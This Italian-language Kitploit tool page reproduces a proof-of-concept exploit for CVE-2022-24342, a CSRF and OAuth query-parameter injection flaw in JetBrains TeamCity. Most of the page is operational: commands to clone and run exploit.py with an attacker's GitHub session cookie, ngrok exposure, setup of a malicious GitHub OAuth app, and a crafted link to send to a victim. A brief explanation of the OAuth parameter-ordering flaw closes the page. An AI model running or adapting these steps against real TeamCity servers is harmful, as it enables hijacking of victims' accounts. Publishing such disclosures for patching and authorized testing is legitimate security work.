Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-24342 — PoC per CVE-2022-24342: furto dell'account tramite CSRF nell'autenticazione GitHub | Kitploit
Strumenti/GitHubGitHub/yuriisanin/cve-2022-24342
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed Teaming
GitHubyuriisanin/cve-2022-24342

CVE-2022-24342

PoC per CVE-2022-24342: furto dell'account tramite CSRF nell'autenticazione GitHub

Vedi Repository
37724 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-24342

JetBrains TeamCity - compromissione dell'account tramite CSRF nell'autenticazione GitHub (PoC)

  • CVE-2022-24342
    • Requisiti
    • Utilizzo
    • Come funziona?
      • GitHub OAuth2: ordine di elaborazione dei parametri di query
      • CVE-2022-24342: flusso delle richieste HTTP

Requisiti

  • JetBrains TeamCity <2021.2.1
  • Autenticazione GitHub abilitata

Utilizzo

  1. Prova ad accedere con l'account GitHub dell'attaccante all'istanza TeamCity di destinazione per autorizzare l'applicazione GitHub di TeamCity.

  2. Installa ed esegui:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-24342
$ cd CVE-2022-24342/
$ pip3 install -r requirements.txt
$ python3 exploit.py -h

usage: exploit.py [-h] -s S [-p P]

optional arguments:
  -h, --help  show this help message and exit
  -s S        GitHub user session
  -p P        Uvicorn port

$ python3 exploit.py -s {attackers_github_session_cookie}

Se esegui l'exploit sulla macchina locale, potresti dover usare Ngrok o alternative.

root@kitploit:~
$ ngrok http 8000
  1. Crea un'applicazione GitHub OAuth2:
root@kitploit:~
homepage: "http://{exploit-host}:8000"
authorization callback url: "http://{exploit-host}:8000/callback"
  1. Invia il seguente link alla vittima:
root@kitploit:~
http://{exploit-host}:8000/exploit?target_host=http://{target-host}&gh_client_id={github_oauth_client_id}

DEMO:

CVE-2022-24342 Demo

Come funziona?

TeamCity era vulnerabile all'iniezione di parametri di query durante il flusso OAuth2, consentendo a un attaccante di reindirizzare l'utente verso un'applicazione GitHub OAuth2 arbitraria, intercettare un parametro stato valido e collegare un account GitHub arbitrario all'account TeamCity della vittima.

Ciò è stato possibile grazie ai seguenti fattori:

  • Ordine di elaborazione dei parametri di query di GitHub OAuth2
  • Iniezione di parametri di query in TeamCity

GitHub OAuth2: ordine di elaborazione dei parametri di query

github-oauth-parameters-processing

CVE-2022-24342: flusso delle richieste HTTP

requests-flow

Supporto

Puoi seguirmi su Twitter, GitHub o YouTube.

Scarica lo strumento